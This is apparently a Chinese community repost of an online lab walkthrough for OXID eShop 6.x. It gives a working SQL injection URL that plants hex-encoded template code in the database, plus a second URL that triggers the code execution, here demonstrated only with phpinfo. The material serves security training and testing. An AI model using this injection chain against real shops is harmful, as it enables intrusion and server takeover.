OXID eShop 6.x ~ 6.3.4 版本SQL注入漏洞到命令执行漏洞在线实验
来源:https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/实验地址:https://www.vsplate.com/?github=vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc&autogo=11. 将PHP代码写入数据库http://***.vsgo.cloud/source/en
·
来源:https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
实验地址:https://www.vsplate.com/?github=vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc&autogo=1
1. 将PHP代码写入数据库
http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)
VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23
2. 触发PHP代码
http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo
开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!
更多推荐
已为社区贡献1条内容
所有评论(0)